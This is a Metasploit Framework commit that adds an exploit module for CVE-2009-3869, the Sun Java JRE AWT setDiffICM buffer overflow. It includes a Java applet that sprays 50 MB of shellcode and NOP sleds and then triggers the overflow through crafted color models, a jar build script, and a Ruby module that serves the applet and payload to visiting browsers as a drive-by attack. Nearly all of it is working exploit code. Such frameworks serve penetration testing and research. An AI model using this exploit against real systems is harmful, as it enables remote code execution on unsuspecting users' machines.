add exploit module for cve-2009-3869

NOTE: no policy change is required for this exploit to succeed.



git-svn-id: file:///home/svn/framework3/trunk@7899 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2009-12-17 04:52:40 +00:00
parent d0a37bd506
commit b37c34579b
5 changed files with 391 additions and 0 deletions

Binary file not shown.

View File

@ -0,0 +1,160 @@
//
// $Id$
//
// Version: $Revision$
//
import java.awt.*;
import java.awt.image.*;
import java.nio.*;
public class AppletX extends java.applet.Applet
{
private IntBuffer [] mem;
private Image src, dst;
private boolean painted = false;
public void init()
{
// load image
src = getImage(getCodeBase(), "test.png");
// wait for image to be loaded
MediaTracker mt = new MediaTracker(this);
mt.addImage(src, 0);
try { mt.waitForAll(); } catch (InterruptedException e) { }
mt.removeImage(src);
// create our filtered version (nasty one!)
ImageProducer ip = src.getSource();
ImageFilter iflt = new BoomFilter();
dst = createImage(new FilteredImageSource(ip, iflt));
try
{
mem = spray(getParameter("sc"), getParameter("np"));
// System.out.println("Sprayed!");
}
catch (Exception e)
{
}
// the vuln shall trigger itself auto-magically on render...
}
public void paint(Graphics g)
{
if (!painted)
{
painted = true;
if (src != null)
g.drawImage(src, 10, 10, this);
if (dst != null)
g.drawImage(dst, 250, 10, this);
}
}
// based on:
// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
public static short[] HexDecode(String s)
{
short[] data = new short[s.length()/2];
for (int i = 0; i < s.length(); i += 2)
{
char c1 = s.charAt(i);
char c2 = s.charAt(i + 1);
int comb = Character.digit(c1, 16) & 0xff;
comb <<= 4;
comb += Character.digit(c2, 16) & 0xff;
data[i/2] = (short)comb;
}
return data;
}
public final IntBuffer [] spray(String sc, String np)
{
short [] sc_bytes = HexDecode(sc);
short [] np_bytes = HexDecode(np);
return spray (sc_bytes, np_bytes);
}
public final IntBuffer [] spray(short[] sc, short[] np)
{
int cnt = 50; // total 50 mb
int sz = 1024*1024; // 1 mb
int nops = (sz / 4) - (sc.length);
IntBuffer [] ret = new IntBuffer[cnt];
for (int bi = 0; bi < cnt; bi++)
{
IntBuffer ib = IntBuffer.allocate(sz / 4);
for (int i = 0; i < nops; ++i)
ib.put((np[0]
| (np[1] << 8)
| (np[2] << 16)
| (np[3] << 24)));
// ib.put(0x90909090);
for (int i = 0; i < sc.length; )
ib.put((sc[i++]
| (sc[i++] << 8)
| (sc[i++] << 16)
| (sc[i++] << 24)));
ret[bi] = ib;
}
return ret;
}
}
class BoomFilter extends java.awt.image.ImageFilter
{
public void setDimensions(int width, int height)
{
// System.out.println("in setDimensions");
consumer.setDimensions(width, height);
// pixels...
int PXSZ = 100*100;
byte[] px = new byte[PXSZ];
for (int i = 0; i < PXSZ; i++)
px[i] = 0x00;
// our length
int SZ1 = 0xff;
int SZ2 = 0x800;
ColorModel cm;
// here we setup two color maps.
// the first one is used to control what values are written to in the second one.
int[] rgba = new int[SZ1];
for (int i = 0; i < SZ1; i++)
rgba[i] = 0xff010203 + i;
rgba[0x01] = 0xff020202;
rgba[0x24] = 0xff020203;
cm = new IndexColorModel(8, SZ1, rgba, 0, false, -1, DataBuffer.TYPE_BYTE);
consumer.setColorModel(cm);
// trigger the bug
rgba = new int[SZ2];
// everything from the first buffer must be found to trigger the overflow
for (int i = 0; i < SZ1; i++)
rgba[i] = 0xff010203 + i;
rgba[0x01] = 0xff020202;
rgba[0x24] = 0xff020203;
for (int i = SZ1; i < SZ2 - 1; i += 2)
{
rgba[i] = 0xff020203;
rgba[i+1] = 0xff020202;
}
cm = new IndexColorModel(8, SZ2, rgba, 0, false, -1, DataBuffer.TYPE_BYTE);
consumer.setPixels(10, 10, 10, 10, cm, px, 1, 1);
}
}

View File

@ -0,0 +1,8 @@
#!/bin/sh
javac -target 1.3 -source 1.3 AppletX.java
jar cvf CVE-2009-3869.jar AppletX.class BoomFilter.class test.png
rm -f AppletX.class BoomFilter.class
mv CVE-2009-3869.jar ../../../../data/exploits/CVE-2009-3869.jar

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.2 KiB

View File

@ -0,0 +1,223 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
#
# This module acts as an HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',
'Description' => %q{
This module exploits a flaw in the setDiffICM function in the Sun JVM.
The payload is serialized and passed to the applet via PARAM tags. It must be
a native payload.
The effected Java versions are JDK and JRE 6 Update 16 and earlier,
JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
earlier, and SDK and JRE 1.3.1_26 and earlier.
NOTE: Although all of the above versions are reportedly vulnerable, only
1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
},
'License' => MSF_LICENSE,
'Author' =>
[
'jduck'
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-3869' ],
[ 'OSVDB', '59710' ],
[ 'BID', '36881' ],
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-078/' ],
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
=begin
No automatic targetting for now ...
[ 'J2SE 1.6_16 Automatic',
{
'Platform' => ['win', 'linux', 'osx'],
'Arch' => [ARCH_X86, ARCH_PPC]
}
],
=end
[ 'J2SE 1.6_16 on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'J2SE 1.6_16 on Mac OS X PPC',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'J2SE 1.6_16 on Mac OS X x86',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 04 2009'
))
end
def on_request_uri(cli, req)
# Create a cached mapping between IP and detected target
@targetcache ||= {}
@targetcache[cli.peerhost] ||= {}
@targetcache[cli.peerhost][:update] = Time.now.to_i
if (target.name =~ /Automatic/)
case req.headers['User-Agent']
when /Windows/i
print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[1]
when /PPC Mac OS X/i
print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[2]
when /Intel Mac OS X/i
print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[3]
else
print_status("Unknown target for: #{req.headers['User-Agent']}")
end
end
# Clean the cache
rmq = []
@targetcache.each_key do |addr|
if (Time.now.to_i > @targetcache[addr][:update]+60)
rmq.push addr
end
end
rmq.each {|addr| @targetcache.delete(addr) }
# Request processing
if (not req.uri.match(/\.jar$/i))
# Redirect to the base directory so the applet code loads...
if (not req.uri.match(/\/$/))
print_status("Sending redirect so path ends with / ...")
send_redirect(cli, get_resource() + '/', '')
return
end
# Display the applet loading HTML
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(payload.encoded),
{
'Content-Type' => 'text/html',
'Pragma' => 'no-cache'
})
return
end
# Send the actual applet over
print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, generate_applet(cli, req),
{
'Content-Type' => 'application/octet-stream',
'Pragma' => 'no-cache'
})
# Handle the payload
handler(cli)
end
def generate_html(pl)
html = %Q|<html>
<head>
<!-- <meta http-equiv=refresh content=10 /> -->
</head>
<body>
<applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3869.jar'>
<param name='sc' value='SCODE' />
<param name='np' value='NOPS' />
</applet>
</body>
</html>
|
# ugh.. pain
debug_payload = false
pload = ""
pload << "\xcc" if debug_payload
pload << pl
if ((pload.length % 4) > 0)
pload << rand_text((4 - (pload.length % 4)))
end
if debug_payload
print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
end
html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))
nops = "\x90\x90\x90\x90"
html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))
return html
end
def generate_applet(cli, req)
this_target = nil
if (target.name =~ /Automatic/)
if (@targetcache[cli.peerhost][:target])
this_target = @targetcache[cli.peerhost][:target]
else
return ''
end
else
this_target = target
end
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar")
fd = File.open(path, "rb")
data = fd.read
fd.close
return data
end
end